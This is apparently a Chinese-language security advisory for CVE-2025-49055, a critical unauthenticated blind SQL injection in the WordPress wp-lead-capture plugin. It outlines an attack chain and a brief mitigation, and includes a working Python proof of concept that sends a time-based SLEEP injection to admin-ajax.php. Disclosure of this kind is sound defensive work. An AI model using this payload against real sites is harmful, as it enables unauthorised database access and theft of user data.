CVE-2025-49055 CVSS 9.3 严重

CVE-2025-49055 WordPress wp-lead-capture插件SQL注入漏洞

披露日期: 2026-01-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-49055

漏洞类型

SQL注入

CVSS评分

9.3 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WP Lead Capturing Pages (wp-lead-capture)

漏洞概述

这是WordPress wp-lead-capture插件中的一个严重SQL注入漏洞，CVSS评分高达9.3，属于严重级别。漏洞源于该插件对用户输入的特殊元素处理不当，导致攻击者可以在未经认证的情况下通过构造恶意SQL查询语句来利用此漏洞。由于该漏洞具有网络攻击向量且无需认证即可利用，攻击者可以远程执行恶意SQL代码，窃取数据库中的敏感信息，包括用户数据、密码哈希等。

技术细节

该SQL注入漏洞存在于wp-lead-capture插件的数据库查询处理逻辑中。攻击者通过在HTTP请求中注入恶意SQL代码片段，由于插件未对用户输入进行充分的参数化处理或转义，攻击者能够操控SQL查询结构。Blind SQL Injection变体意味着攻击者无法直接看到查询结果，但可以通过观察应用响应的时间差异或内容差异来推断数据库信息。

攻击链分析

STEP 1

步骤1

攻击者识别目标WordPress网站并确认wp-lead-capture插件版本<=2.5

STEP 2

步骤2

构造包含SQL注入载荷的HTTP请求，针对存在漏洞的输入字段

STEP 3

步骤3

通过Blind SQL Injection技术逐步提取数据库内容

STEP 4

步骤4

获取用户敏感信息或完全控制数据库

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import sys target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' # SQL injection payload for time-based blind SQLi payload = "' AND (SELECT * FROM (SELECT(SLEEP(5)))a) AND '1'='1" response = requests.get(f'{target}/wp-admin/admin-ajax.php', params={ 'action': 'lead_capture_submit', 'name': payload, 'email': '[email protected]' }) if response.elapsed.total_seconds() > 5: print('Vulnerability confirmed: SQL injection successful') else: print('Target may not be vulnerable')

影响范围

wp-lead-capture <= 2.5

防御指南

临时缓解措施

如果无法立即升级，可临时禁用wp-lead-capture插件，同时配置Web应用防火墙规则阻断可疑的SQL注入尝试请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表